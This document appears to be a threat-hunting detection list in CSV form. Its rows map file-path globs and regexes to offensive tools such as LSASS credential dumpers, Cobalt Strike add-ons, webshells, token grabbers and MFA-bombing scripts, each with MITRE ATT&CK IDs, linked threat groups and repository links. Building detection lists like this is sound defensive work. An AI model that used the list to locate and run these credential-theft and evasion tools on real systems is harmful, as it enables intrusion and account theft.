"*\lsass.DMP",".{0,1000}\\lsass\.DMP","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","16395"
"*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","N/A","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","16396"
"*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rookuu/BOFs","1","0","N/A","N/A","10","10","175","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z","16397"
"*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","16398"
"*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","16399"
"*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","16400"
"*\lsass.rar*",".{0,1000}\\lsass\.rar.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16402"
"*\lsass.zip*",".{0,1000}\\lsass\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16403"
"*\Lsass_Shtinkering.cpp*",".{0,1000}\\Lsass_Shtinkering\.cpp.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16404"
"*\LSASS_Shtinkering.sln*",".{0,1000}\\LSASS_Shtinkering\.sln.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16405"
"*\LSASS_Shtinkering\*",".{0,1000}\\LSASS_Shtinkering\\.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16406"
"*\lsass64.exe*",".{0,1000}\\lsass64\.exe.{0,1000}","offensive_tool_keyword","lslsass","dump active logon session password hashes from the lsass process (old tool for vista and older)","T1003.001","TA0006","N/A","APT1","Credential Access","https://www.virustotal.com/gui/file/b24ab1f8cb68547932dd8a5c81e9b2133763a7ddf48aa431456530c1340b939e/details","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16407"
"*\LSASSProtectionBypass\*",".{0,1000}\\LSASSProtectionBypass\\.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","16408"
"*\Lsass-Shtinkering-main*",".{0,1000}\\Lsass\-Shtinkering\-main.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16409"
"*\LsassSilentProcessExit*",".{0,1000}\\LsassSilentProcessExit.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","16410"
"*\Lsassx.ps1*",".{0,1000}\\Lsassx\.ps1.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","16411"
"*\Lsassx-main*",".{0,1000}\\Lsassx\-main.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","16412"
"*\Lsassx-OBF.ps1*",".{0,1000}\\Lsassx\-OBF\.ps1.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","16413"
"*\lsassy_dump.py*",".{0,1000}\\lsassy_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16414"
"*\lslsass.exe*",".{0,1000}\\lsass\.exe.{0,1000}","offensive_tool_keyword","lslsass","dump active logon session password hashes from the lsass process (old tool for vista and older)","T1003.001","TA0006","N/A","APT1","Credential Access","https://www.virustotal.com/gui/file/b24ab1f8cb68547932dd8a5c81e9b2133763a7ddf48aa431456530c1340b939e/details","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16416"
"*\luajit.exe*",".{0,1000}\\luajit\.exe.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","16418"
"*\luna.log*",".{0,1000}\\luna\.log.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","16419"
"*\Luna-Logged-*.zip*",".{0,1000}\\Luna\-Logged\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","16420"
"*\LyncSniper.ps1*",".{0,1000}\/LyncSniper\.ps1.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","16421"
"*\M3 AutoIt Rat *.exe*",".{0,1000}\\M3\sAutoIt\sRat\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16422"
"*\m365-fatigue.py*",".{0,1000}\\m365\-fatigue\.py.{0,1000}","offensive_tool_keyword","m365-fatigue","automates the authentication process for Microsoft 365 by using the device code flow and Selenium for automated login. It keeps bombing the user with MFA requests and stores the access_token once the MFA was approved.","T1110.001 - T1078.001 - T1556.004","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/0xB455/m365-fatigue","1","0","N/A","N/A","10","1","77","7","2024-04-08T14:53:44Z","2023-11-30T13:33:03Z","16423"
"*\m3-gen.py*",".{0,1000}\\m3\-gen\.py.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","16424"
"*\MaccaroniC2*",".{0,1000}\\MaccaroniC2.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","16425"
"*\MaceTrap.exe*",".{0,1000}\\MaceTrap\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16426"
"*\machine_role.py*",".{0,1000}\\machine_role\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16427"
"*\MachineAccountQuota.py*",".{0,1000}\\MachineAccountQuota\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16428"
"*\Macker's Private PHPShell.php*",".{0,1000}\\Macker\'s\sPrivate\sPHPShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16429"
"*\macoffe.pdb*",".{0,1000}\\macoffe\.pdb.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","16430"
"*\macro_pack.exe*",".{0,1000}macro_pack.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","16431"
"*\macro_pack.py*",".{0,1000}\\macro_pack\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","16432"
"*\macro64.vba*",".{0,1000}\\macro64\.vba.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","0","N/A","N/A","9","4","381","82","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z","16433"
"*\maildump.txt*",".{0,1000}\\maildump\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16434"
"*\mailpv.exe*",".{0,1000}\\mailpv\.exe.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16435"
"*\MakeMeAdmin * x64 Debug.msi*",".{0,1000}\\MakeMeAdmin\s.{0,1000}\sx64\sDebug\.msi.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","16436"
"*\MakeMeAdmin * x64.msi*",".{0,1000}\\MakeMeAdmin\s.{0,1000}\sx64\.msi.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","16437"
"*\MakeMeAdmin.sln*",".{0,1000}\\MakeMeAdmin\.sln.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","16438"
"*\MakeMeAdmin-main*",".{0,1000}\\MakeMeAdmin\-main.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","16439"
"*\MakeMeEnterpriseAdmin.ps1",".{0,1000}\\MakeMeEnterpriseAdmin\.ps1","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","16440"
"*\MakeMeEnterpriseAdmin.ps1*",".{0,1000}\\MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","16441"
"*\malDll.dll*",".{0,1000}\\malDll\.dll.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","16442"
"*\malseclogon.*",".{0,1000}\\malseclogon\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","16443"
"*\MalStuff.cpp*",".{0,1000}\\MalStuff\.cpp.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","16444"
"*\malware_runner.py*",".{0,1000}\\malware_runner\.py.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","0","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","16445"
"*\manspider_*.log*",".{0,1000}\\manspider_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","16446"
"*\masky.py*",".{0,1000}\\masky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16447"
"*\masscan\src\*",".{0,1000}\\masscan\\src\\.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","16448"
"*\master\GPSCoordinates\*",".{0,1000}\\master\\GPSCoordinates\\.{0,1000}","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","16449"
"*\Mayhem.psm1*",".{0,1000}\\Mayhem\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","16450"
"*\MDE_Enum.csproj*",".{0,1000}\\MDE_Enum\.csproj.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","16451"
"*\MDE_Enum.exe*",".{0,1000}\\MDE_Enum\.exe.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","16452"
"*\MDE_Enum\Program.cs*",".{0,1000}\\MDE_Enum\\Program\.cs.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","16453"
"*\MeasureObjectCommand.cs",".{0,1000}\\MeasureObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","16454"
